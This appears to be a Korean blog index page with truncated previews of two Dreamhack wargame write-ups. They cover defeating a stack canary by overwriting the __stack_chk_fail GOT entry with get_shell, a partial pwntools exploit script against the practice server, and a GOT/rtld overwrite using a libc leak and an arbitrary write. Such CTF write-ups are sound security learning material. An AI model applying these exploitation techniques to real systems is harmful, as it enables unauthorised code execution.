anonymous?

이 문제 생각 많이 했는데 카나리를 leak해서 return address를 get_shell로 덮는 복잡한 방법이 아니라 카나리 변조 시 __stack_chk_fail 함수가 호출되는 것을 이용해서 카나리를 덮은 후 v4에 __stack_chk_fail got를 주고 v5에 get_shell 주소를 주면 종료 시 get_shell이 실행되어 쉘이 따진다. #!/usr/bin/python from pwn import * context.log_level = 'debug' #p = process("./ssp_000") p = remote("host1.dreamhack.games", 8244) elf = ELF("./ssp_000") get_shell = elf.symbols['get_shell'] p.sen..

SYSTEM HACKING/Dreamhack 2020. 5. 31. 10:50

# 보호기법 # process int main() { long addr; long value; initialize(); printf("stdout: %p\n", stdout); printf("addr: "); scanf("%ld", &addr); printf("value: "); scanf("%ld", &value); *(long *)addr = value; return 0; } libc leak을 할 수 있고, 특정 addr에 원하는 value를 쓸 수 있다. Partial RELRO이므로 위의 과정으로 GOT overwrite이 가능하다. exit로 종료되는 경우 rtld를 덮으면 프로그램의 흐름을 변조가 가능하다. _libc_start_main함수에서 exit를 자동으로 호출해서 프로그램 자체에서 ..

SYSTEM HACKING/Dreamhack 2020. 5. 17. 11:36